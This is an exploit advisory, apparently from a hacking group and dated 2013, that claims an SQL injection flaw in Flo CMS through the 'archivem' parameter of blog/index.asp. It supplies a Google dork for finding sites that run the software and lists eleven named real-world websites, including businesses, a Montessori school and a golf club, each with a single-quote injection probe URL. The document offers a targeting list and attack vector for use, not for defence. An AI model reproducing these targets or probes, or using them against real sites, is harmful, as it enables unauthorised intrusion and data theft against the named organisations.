#******************************************************************************** # [+] Exploit Title : Flo cms Sql injection vulnerability # # [+] Software link : http://www.flocms.ie # [+] Designer link : http://www.flowebdesign.ie # # [+] Exploit Author : Ashiyane Digital Security Team # # [+] Tested on: Windows 7 , Linux # # [+] Google Dork : intext:"Design by Flo Web Design & powered by Flo CMS" # # [+] Date: 2013/09/01 # -------------------------------------------------------------------- # [+] Exploit : # # [+] Location : [Target]/blog/index.asp?archivem=[Sql Injection] # #------- # Proof: #------- # # http://www.kellschamber.ie/blog/index.asp?archivem=' # # http://www.locumotion.com/blog/index.asp?archivem=' # # http://www.tamhnach.org/blog/index.asp?archivem=' # # http://www.royaltaragolfclub.com/blog/index.asp?archivem=' # # http://www.thebective.ie/blog/index.asp?archivem=' # # http://www.slanefarmhostel.ie/blog/index.asp?archivem=' # # http://www.sandbar.ie/blog/index.asp?archivem=' # # http://www.recruitmentbureau.com/blog/index.asp?archivem=' # # http://www.joecurrancommercials.com/blog/index.asp?archivem=' # # http://www.littonlanetraining.com/blog/index.asp?archivem=' # # http://www.kentstownmontessori.com//blog/index.asp?archivem=' # ###################### discovered by : ACC3SS ######################